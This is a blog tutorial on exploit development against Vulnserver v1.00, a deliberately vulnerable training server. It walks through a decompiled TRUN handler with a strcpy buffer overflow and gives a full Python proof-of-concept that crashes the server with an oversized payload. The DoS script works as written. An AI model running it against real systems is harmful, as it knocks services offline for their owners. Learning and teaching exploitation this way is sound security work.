Post

Exploit Development - Vulnserver v1.00 Part 1

DoS exploit development against Vulnserver v1.00

Posted Updated
By The Rusty
2 min read
Exploit Development - Vulnserver v1.00 Part 1

YouTube

Vulnerability

Vulnserver v1.00 has the following commands:

  1. HELP
  2. STATS [stat_value]
  3. RTIME [rtime_value]
  4. LTIME [ltime_value]
  5. SRUN [srun_value]
  6. TRUN [trun_value]
  7. GMON [gmon_value]
  8. GDOG [gdog_value]
  9. KSTET [kstet_value]
  10. GTER [gter_value]
  11. HTER [hter_value]
  12. LTER [lter_value]
  13. KSTAN [lstan_value]
  14. EXIT

The code that controls TRUN is as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

else if ( !strncmp(buf, "TRUN ", 5u) )
{
	Destination = (char *)malloc(3000u);
	memset(Destination, 0, 3000u);
	for ( i = 5; i < len; ++1 )
	{
		if ( buf[i] == 46 )
		{
			strncpy(Destination, buf, 3000u);
			Function3(Destination);
			break;
		}
	}
	memset(Destination, 0, 0xBB8u);
	v17 = send(s, "TRUN COMPELTE\n", 14, 0);
}

char *__cdecl Function3(char *Source)
{
	char Destination[2008];

	return strcpy(Destination, Source);
}

Here, if the 6th value of the string following the TRUN command matches 46 (ASCII text (46): .), Function3 is called from essfunc.dll. This function creates a buffer that can store a string of 2008 bytes but then saves 3000 bytes into it. This is a very dangerous vulnerability that can allow a Buffer OverFlow (BOF) attack.

PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58

from argparse import ArgumentParser
from socket import *

def createPayload():
    data = b"A" * 65535

    payload = b"TRUN \x2E"
    payload += data

    return payload

def exploit(ip: str, port: int):
    print("[~] Generating payload...")
    payload = createPayload()
    print("[+] Payload generated")

    s = socket(AF_INET, SOCK_STREAM)
    print(f"[~] Connecting to the target: [{ip}]:{port}")
    s.connect((ip, port))

    print("[~] Waiting for a connection message...")
    conn_msg = s.recv(65535)
    print(f"[+] A connection message received: {conn_msg.decode()}")

    print("[~] Sending the payload...")
    s.send(payload)
    s.close()
    print("[+] Connection closed")

    print("[+] DoS Exploit Completed")

def main():
    parser = ArgumentParser(
        prog="Vulnserver v1.00 Exploit",
        description="TRUN command BOF DoS Vulnerability"
    )
    parser.add_argument(
        "-t", "--target",
        type=str,
        help="Set target IPv4 address",
        required=True
    )
    parser.add_argument(
        "-p", "--port",
        type=int,
        help="Set target port number",
        required=True
    )
    
    args = parser.parse_args()

    target_ip       = str(args.target)
    target_port     = int(args.port)

    exploit(target_ip, target_port)

if __name__ == "__main__":
    main()

The Proof of Concept (PoC) above is code that overwrites 65,535 bytes of memory via a Buffer Overflow (BOF) attack. The program terminates abnormally with a DEP Violation error. A DEP Violation error means that an error is returned due to an attempted return to a non-executable memory location. This indicates that it’s possible to overwrite the return address in the program to perform a Control Flow Hijack, which could ultimately lead to the execution of a remote attacker’s shellcode. In Part 2, we will develop an RCE Exploit involving a NOP Slide and shellcode generation.

Exploit Research, Exploit Development
binary exploitation exploit vulnerability research
This post is licensed under CC BY 4.0 by the author.